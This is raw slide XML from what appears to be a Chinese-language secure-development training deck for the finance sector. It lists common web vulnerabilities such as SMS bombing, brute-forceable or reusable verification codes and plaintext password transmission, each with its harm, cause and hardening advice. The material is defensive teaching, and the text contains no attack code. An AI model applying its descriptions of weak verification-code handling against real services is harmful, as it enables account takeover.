              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加固建议</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="8B0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>    对同一手机号发送次数进行限制，检测数据包中的手机号长度，检测数据包中是否含有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>头，对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>cooki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>进行校验。最直接的办法我认为在向手机发送验证码前，添加图形验证码即可</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791320" y="6237312"/>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73907"/>
            <a:ext cx="6624637" cy="652486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SQL</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XSS</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文件上传</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权限控制不当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硬编码密码</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逻辑缺陷： 后台认证绕过漏洞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口令管理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敏感信息泄露</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未释放资源</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弱加密</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短信</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>轰炸</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN"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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>码可暴力破解</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>码可暴力破解</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solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>危害</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="8B0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>    验证码可暴力破解一般情况都是针对于手机验证码，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>四</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>位手机验证码并且时效在五分钟，而且存在验证码可爆破的话，五分钟内是完全可以爆破出来正确的验证码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>原因</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="8B0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>    在验证码进行校验时，没有对其进行次数限制，而且验证码使用一次正确后在有效时间内可以再次使用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加固建议</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="8B0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>    对验证码输错次数进行限制，或者验证码输入正确一次后就不能再次使用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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791320" y="1700808"/>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73907"/>
            <a:ext cx="6624637" cy="652486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endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="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密码</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>明文传输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验证码可绕过或重复使用</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任意密码登录</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其他常见漏洞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跨站点请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CSRF</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数据库访问控制</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反编译</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会话标识未更新</a:t>
            </a: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URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>重定向攻击</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启用不安全的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>WebDAV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>模块</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批量请求攻击</a:t>
            </a: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密码明文传输</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solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>危害</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="8B0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>    如果有中间人进行攻击的话，可以直接获取用户密码，从而可以直接登录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>原因</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="8B0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>    使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>协议，在密码进行传输时，未对其进行加密</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加固建议</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="8B0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>    使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>协议，或者在密码进行传输时，进行加密，避免使用弱加密。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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791320" y="2132856"/>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73907"/>
            <a:ext cx="6624637" cy="652486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endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660033"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRP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密码明文传输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验证码可绕过或重复使用</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任意密码登录</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其他常见漏洞</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跨站点请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CSRF</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数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>访问控制</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反编译</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会话标识未更新</a:t>
            </a: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URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>重定向攻击</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启用不安全的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>WebDAV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>模块</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批量请求攻击</a:t>
            </a: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432339" y="3429000"/>
            <a:ext cx="4899989" cy="2160240"/>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9" name="圆角矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="425071" y="1580134"/>
            <a:ext cx="4899989" cy="1639552"/>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490" dirty="0">
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>金融开发安全存在的问题？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451389" y="1049120"/>
            <a:ext cx="7886700" cy="461425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>大部分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>金融保险机构</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>已经采取了上线前的安全测试，定期安全评估。但：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>金融技术中心</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8D486EDB-1F4B-46FD-9A29-FEB36E09C7CB}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="589065" y="3449698"/>
            <a:ext cx="4572000" cy="2062103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="214630" indent="-214630">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>开发兼顾安全了，成本、时间投入肯定要增多，到底合算吗？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="214630" indent="-214630">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>开发需要实现业务功能，同时考虑高效、便捷、快速，安全如何平衡啊？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="214630" indent="-214630">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>想在开发环节引入安全控制，如何做？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="214630" indent="-214630">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>开发人员也想更安全的设计、更安全的编码，有什么标准吗？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="214630" indent="-214630">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>有没有更高效的方式？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432339" y="1583123"/>
            <a:ext cx="4572000" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="214630" indent="-214630">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>安全漏洞多，修复成本高。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="214630" indent="-214630">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>上线时间紧张，带着中、低漏洞上线，到底安全不安全？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="214630" indent="-214630">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>安全漏洞总是重复出现，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>跨站脚本、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>注入、越权</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>…….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="214630" indent="-214630">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>大量使用外包开发，外包开发安全如何控制？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="右箭头 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5489375" y="2226873"/>
            <a:ext cx="472965" cy="390197"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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90" dirty="0">
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="右箭头 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5592818" y="4285650"/>
            <a:ext cx="472965" cy="390197"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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490" dirty="0">
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="圆角矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6309434" y="1711956"/>
            <a:ext cx="2412124" cy="498976"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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90" b="1" dirty="0">
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在软件开发需求开始即引入安全控制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="圆角矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6299537" y="3829141"/>
            <a:ext cx="2412124" cy="498976"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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90" b="1" dirty="0">
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>监管、标准、最佳实践</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="圆角矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6328831" y="2362207"/>
            <a:ext cx="2412124" cy="7825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90" dirty="0">
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>建立覆盖全软件开发生命周期的安全控制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="圆角矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6302265" y="4495793"/>
            <a:ext cx="2412124" cy="7825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90" dirty="0">
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>开发安全控制投入是值得的</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>码可绕过或重复使用</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solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>危害</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="8B0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>验证码可绕过失去了原本验证码的目的，如果是手机验证码登录的话，被绕过就可以直接登录了；验证码重复使用最直接的危害就是可以暴力破解。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>原因</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="8B0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>    验证码可绕过原因是验证码的校验方式可能只是前端校验，只是对响应包的状态码来判断验证码是否正确；验证码可重复使用的原因是验证码使用一次后未进行及时更新，导致抓包后可以一直使用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加固建议</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="8B0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>    验证码校验在后台进行校验并且验证码无论填写正确与否，使用一次自动更新一次。</a:t>
            </a:r>
